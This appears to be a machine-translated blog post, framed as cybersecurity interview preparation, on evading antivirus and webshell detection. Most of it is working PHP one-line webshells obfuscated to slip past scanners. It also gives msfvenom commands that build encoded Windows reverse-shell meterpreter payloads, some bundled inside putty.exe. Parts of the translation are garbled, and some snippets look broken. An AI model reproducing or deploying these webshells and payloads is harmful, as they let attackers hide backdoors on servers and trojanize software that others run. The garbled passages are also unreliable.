Article directory
Preface
Common cybersecurity interview questions
topic
1. Anti-killing requirements, anti-killing technology, anti-killing techniques, and practical anti-killing practices
Anti-kill requirements
Because the ultimate purpose of the designed Trojan is to upload the Trojan to the target server when it is discovered that the target website has an upload vulnerability, and can remotely access it to achieve remote control. However, some websites will have security dogs, D-shields, Security Knights, Guardian Gods, and Cloud Locks. If protection software can detect and kill some Webshells, then if you want to use Webshells for remote control, you need to avoid killing them, so as to avoid the inspection of Trojan killing tools.
Anti-virus technology
Currently, the mainstream methods for detecting and killing Trojans include static inspection, dynamic detection, and log inspection.
1. Static inspection detects and kills Trojan programs by matching signatures, dangerous functions and Trojan characteristic values. It is characterized by being fast and convenient, and has a high accuracy in finding known Trojan programs. Its disadvantage is that it has a high false positive rate, cannot find 0Day Trojans, and is easy to be bypassed.
2. Dynamic detection is based on the dynamic characteristics of the Trojan program. When the Trojan program is uploaded to the server, the attacker will always execute it. The characteristics displayed when the Trojan program is executed are so-called dynamic characteristics.
2. Log detection is mainly implemented through log analysis and detection technology, which mainly detects abnormal files by analyzing a large number of log files and establishing request models. Its advantage is that when the level of visits on the website reaches a consistent value, this detection method has greater reference value. Its disadvantage is that there is a certain false positive rate. For a large number of log files, the processing power and efficiency of the detection tool will become relatively low.
Tips to avoid killing
1. Trojan programs can be designed using a variety of programming languages. Different programming languages have different characteristics and provided system functions. Therefore, when realizing anti-virus protection, you can first consider using the characteristics of the language to achieve anti-virus protection. 2. Secondly, you can use the characteristics of the language to avoid anti-virus software
. Use the scanning and killing rules of the scanning and killing software to reconstruct the Trojan horse program and avoid the scanning and killing of the Trojan horse scanning and killing tools.
3. At the same time, you can consider the encryption and decryption in cryptography to encrypt and decrypt the source Trojan horse program to avoid the scanning and killing of the Trojan horse scanning and killing tools. examine.
The core of Trojan anti-killing technology lies in "flexibility".
Kill-free actual combat
When the Trojan horse has not undergone anti-kill transformation, for example
<?php
@eval($_POST['123']);
?>
Webshell anti-virus:
1. Reference to avoid killing
Because D-Shield, Security Dog, and Guardian God will trace the source of the execution variable in the keyword eval, when the variable to be executed is a suspicious data received through POST, the suspicious Trojan will be displayed. In order to avoid this traceability method, You can reference the previous variable by using & multiple times, and through a series of assignment operations, finally concatenate the content to be executed with backticks and pass it into eval to avoid killing. The specific implementation is as follows:
<?php
$b=&$a;
$a=$_POST['123'];
$c=&$b;
eval(`/***aaa***/`.$c);
?>
2. Variable variables
Variable variables are a unique variable in PHP. They can dynamically change the name of a variable. This feature can be used to prevent Trojans from killing. First, you can define a variable a and assign it the value aa, then assign the Trojan content to the variable variable a and assign it the value aa, and then assign the Trojan content to the variable variablea and assign it the value aa ,Then assign the Trojan content to the variable variable a. Finally, when calling the eval function to execute, the execution object is defined as a. Finally, when the eval function is called to execute, the execution object is defined asa,Finally, when calling the e v a l function, just define the execution object as aa. The specific implementation is as follows:
<?php
$a = 'aa';
$$a = $_POST['123'];
eval(`/**123**/`.$aa);
?>
3. Two-dimensional array
When avoiding killing, we can consider putting the one-sentence Trojan program to be executed into an array to achieve the purpose of bypassing, for example:
<?php
$b =substr_replace("assexx","rt",4);
$a = array($array = array(" => $b($_POST['123'])));
var_dump($a);
?>
4. Array intersection
While doing anti-virus research, we found that we can get the value we want through the intersection of arrays, and then use it in the construction of the Trojan program, for example:
<?php
$a1=array("a"=>"red" ,"ss"=>"green","c"=>"blue" ,"er"=>"hello","t"=>"hey");
$a2=array("a"=>"red","ss"=>"blue" ,"d"=>"pink","er"=>"hellos", "moza"=>"good_boy","t"=>"hey");$result=array_intersect_key($a1,$a2);//取数组交集
$a = array_keys($result);//取数组键值
$man = $a[0].$a[1].$a[2]."t";
$kk=$_POST['q'];
@$man(`/**/`.$kk=$kk);print _r($a1);//扰乱规则
?>
This anti-virus method can bypass most anti-virus software
5.Callback function
The array_map() callback function will return the array after the user-defined function is applied. The specific usage and parameters of the array_map() function are as follows:
Here we can first define a function test, in which the first parameter a is used as the callback function name, the second parameter a is used as the callback function name, and the second parameter a is used as the callback function name.a is used as the callback function name, and the second parameter b is used as the parameter of the callback function, which is then passed to the array_map() function for execution. After that, we call the test function externally, passing in our callback function name and callback function. Parameters
<?php
function test($a,$b){
array_map($a,$b);
}
test(eval,array($_POST['123']));
?>
array_filter()
call_user_func_array() //可代替array_map的函数
6. Encoding
Key functions such as eval, assert, etc. can be base64 encoded, or spliced through arrays and then called back, etc.
Trojans are free from killing:
1.msf comes with anti-virus software
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.144 lport=4444 -e x86/shikata_ga_nai -b "\x00" -i 15 -f exe -o shell.exe
2. msf bundled to avoid killing
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.144 lport=4444 -x putty.exe -f exe -o shell.exe
3. msf comes with anti-kill + bundling
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.144 lport=4444 -e x86/shikata_ga_nai -x putty.exe -i 15 -f exe -o shell.exe
4.backdoor-factory
5.unicorn unicorn
Summarize
This issue mainly introduces some methods to avoid killing Trojans.